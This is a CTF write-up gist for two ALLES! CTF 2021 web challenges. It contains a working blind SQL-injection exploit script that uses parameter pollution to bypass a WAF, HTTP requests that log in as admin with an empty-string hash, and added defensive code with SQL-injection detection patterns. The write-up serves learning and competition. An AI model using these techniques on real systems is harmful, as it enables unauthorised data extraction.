
@arkark
Last active September 5, 2021 04:51
ALLES! CTF 2021


[web] J(ust)-S(erving)-P(ages)

$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
Set-Cookie: JSESSIONID=7D12EE368BD32FB4C496CBE29BA4A23D; Path=/; HttpOnly

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
... snip ...
    <p>
        <div class="alert alert-success" role="alert">
            User configuration updated
          </div>
    </p>
</main><!-- /.container -->
</html>


$ http --session=./session.json --form POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/login" username=admin password=da39a3ee5e6b4b0d3255bfef95601890afd80709
HTTP/1.1 200
Content-Length: 2935
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:37 GMT


<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
... snip ...
    <h1>Welcome to the User Panel</h1>


        You are <b></b>admin</b>
                <br><br>
                Your flag is:
ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}

                <br>

                <a href="logout">Logout</a>
</main><!-- /.container -->
</html>

da39a3ee5e6b4b0d3255bfef95601890afd80709 is the SHA-1 hash of the empty string.

Flag: ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}
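A defender-side audit that follows from the observation above, written as an added example (not code from the gist or the challenge): it flags stored credential hashes that equal the digest of an empty input, which is what let the admin login succeed here. The sample rows are constructed; only the admin hash value comes from the writeup.

```python
import hashlib

# Constructed sample rows (username, stored password hash). The admin value is
# the one shown in the writeup; the second row is a made-up placeholder digest.
SAMPLE_USERS = [
    ("admin", "da39a3ee5e6b4b0d3255bfef95601890afd80709"),
    ("alice", "0123456789abcdef0123456789abcdef01234567"),
]

# Digests of the empty byte string under algorithms commonly (mis)used for
# password storage. A stored hash equal to one of these means the account is
# effectively protected by no password at all.
EMPTY_INPUT_DIGESTS = {
    "md5": hashlib.md5(b"").hexdigest(),
    "sha1": hashlib.sha1(b"").hexdigest(),
    "sha256": hashlib.sha256(b"").hexdigest(),
}


def find_empty_password_hashes(rows):
    """Return [(username, algorithm)] for every row whose stored hash is the
    digest of an empty input. Comparison is case-insensitive and ignores
    surrounding whitespace, since dumps and config files vary in both."""
    by_digest = {digest: algo for algo, digest in EMPTY_INPUT_DIGESTS.items()}
    hits = []
    for username, stored in rows:
        algo = by_digest.get(stored.strip().lower())
        if algo is not None:
            hits.append((username, algo))
    return hits


if __name__ == "__main__":
    for username, algo in find_empty_password_hashes(SAMPLE_USERS):
        print(f"{username}: stored hash is {algo} of the empty string")
```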

[web] Amazing Crypto WAF

$ python exploit.py

4
4c
4ca
... snip ...
4ca51bd230de44bbb2f7fab021cc73
4ca51bd230de44bbb2f7fab021cc730
user_uuid: 4ca51bd230de44bbb2f7fab021cc730e
ENCRYPT:
ENCRYPT:c
ENCRYPT:c1
... snip ...
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT0
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
cipher_note: ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
<!doctype html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
        <title>noter</title>
    </head>
    <body class="bg-gray-50">
        <div class="flex flex-row bg-gray-100 px-5 py-2">


            <a href="/notes" class="hover:underline hover:text-green-500 text-black py-1 px-4 font-bold">

                noter <span class="text-green-500" style="font-size:.6rem">DEMO</span>
            </a>


                <a href="/notes" class="hover:underline hover:text-green-600 text-green-500 py-1 px-4 mr-2">ALLES!{American_scientists_said,_dont_do_WAFs!}</a>
                <a href="/logout">
... snip ...

Flag: ALLES!{American_scientists_said,_dont_do_WAFs!}

exploit.py

import httpx
import random
import string

# ALLES! CTF 2021
# [web] Amazing Crypto WAF

# URL = "http://localhost:5000/"
URL = "https://7b0000005f7830b2f97927b7-amazing-crypto-waf.challenge.master.allesctf.net:31337/"

# Note: httpx 0.20+ renamed `allow_redirects` to `follow_redirects`; this
# script was written against the older keyword.
with httpx.Client() as client:
    # Register a throwaway account and log in with it.
    username = ''.join(random.choice(string.ascii_letters) for _ in range(10))
    password = ''.join(random.choice(string.ascii_letters) for _ in range(10))
    res = client.post(
        URL + "registerlogin",
        data={
            "username": username,
            "password": password,
        },
        allow_redirects=False
    )
    assert res.status_code == 302

    # Create one note. Its body is the boolean oracle: it appears in the
    # listing only when the injected condition evaluates to true.
    note_body = "hogehogehoge"
    res = client.post(
        URL + "add_note",
        data={
            "title": "aaaaaa",
            "body": note_body,
        },
        allow_redirects=False
    )
    assert res.status_code == 302

    # --
    # Recover the 32-hex-char uuid of user 'flagger' one character at a time.
    # Binary search over the sorted alphabet: `ok` is the largest index whose
    # glob character class still matched, `ng` the smallest that did not.
    chars = "0123456789abcdef"
    prefix = ""
    for i in range(32):
        print(prefix)
        ok = -1
        ng = len(chars)
        while ng - ok > 1:
            mid = (ok + ng)//2
            res = client.get(
                URL + "notes%3f",
                params=f"order=1&order=asc limit (iif((select 1 from users where username='flagger' and uuid glob '{prefix}[{chars[mid:]}]*'), 1, 0))/*=x",
            )
            assert res.status_code == 200
            assert res.text != "error"
            if note_body in res.text:
                ok = mid
            else:
                ng = mid
        assert ok >= 0
        prefix += chars[ok]
    user_uuid = prefix
    print("user_uuid:", user_uuid)

    # --
    # Same oracle, now against the body of that user's note (an "ENCRYPT:"
    # base64 blob). The loop stops when no character of the alphabet matches,
    # i.e. the end of the stored value has been reached.
    chars = "=+/" + string.ascii_letters + string.digits
    prefix = "ENCRYPT:"
    while True:
        print(prefix)
        ok = -1
        ng = len(chars)
        while ng - ok > 1:
            mid = (ok + ng)//2
            res = client.get(
                URL + "notes%3f",
                params=f"order=1&order=asc limit (iif((select 1 from notes where user='{user_uuid}' and body glob '{prefix}[{chars[mid:]}]*'), 1, 0))/*=x",
            )
            assert res.status_code == 200
            assert res.text != "error"
            if note_body in res.text:
                ok = mid
            else:
                ng = mid
        if ok == -1:
            break
        prefix += chars[ok]
    cipher_note = prefix
    print("cipher_note:", cipher_note)

    # --
    # Log out and register again using the recovered ciphertext as the
    # username; the response page then contains the decrypted value.
    res = client.get(
        URL + "logout",
        allow_redirects=False,
    )
    assert res.status_code == 302
    res = client.post(
        URL + "registerlogin",
        data={
            "username": cipher_note,
            "password": password,
        },
        allow_redirects=True
    )
    assert res.status_code == 200
    print(res.text)
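For the detection side of the technique the script above relies on (a duplicated `order` query parameter carrying SQL into an ORDER BY, sent to a percent-encoded `notes%3f` path), here is an added example that is not part of the gist: it scans access-log lines for parameter pollution, SQL fragments inside parameter values, and an encoded `?` in the path, and grades each request. The log lines are constructed to mirror the request shape shown in the exploit; the log format, field names and severity levels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (common log format). The second line
# mimics the injected `order` parameter from the exploit above; the first and
# third are a benign request and a bare duplicated parameter, for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Sep/2021:11:30:01 +0000] "GET /notes?order=title&limit=10 HTTP/1.1" 200 2900
10.0.0.9 - - [04/Sep/2021:11:30:02 +0000] "GET /notes%3f?order=1&order=asc%20limit%20(iif((select%201%20from%20users%20where%20username%3D'flagger'%20and%20uuid%20glob%20'4[89abcdef]*'),%201,%200))/*%3Dx HTTP/1.1" 200 2900
10.0.0.9 - - [04/Sep/2021:11:30:03 +0000] "GET /notes?order=asc&order=desc HTTP/1.1" 200 2900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Fragments that have no business inside a sort-order value.
SQL_HINT_RE = re.compile(r"\biif\s*\(|\bselect\b|\bglob\b|/\*|--", re.IGNORECASE)


def analyze_target(target: str) -> dict:
    """Inspect one request target (path + query) and return the findings."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    names = [k for k, _ in pairs]
    # HTTP parameter pollution: the same name sent more than once, which is how
    # the exploit smuggles a second `order` past a check that reads only one.
    dup_params = sorted({n for n in names if names.count(n) > 1})
    sql_hint_params = sorted({k for k, v in pairs if SQL_HINT_RE.search(v)})
    # A percent-encoded '?' in the path hints at router/WAF desynchronisation.
    encoded_qmark = "%3f" in parts.path.lower()
    if sql_hint_params:
        severity = "high"
    elif dup_params or encoded_qmark:
        severity = "medium"
    else:
        severity = "ok"
    return {"severity": severity, "dup_params": dup_params,
            "sql_hint_params": sql_hint_params, "encoded_qmark_in_path": encoded_qmark}


def scan_log(log_text: str) -> list:
    """Return one finding dict per request line that could be parsed."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = analyze_target(m.group("target"))
        finding["target"] = m.group("target")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["dup_params"], f["sql_hint_params"], f["target"][:60])
```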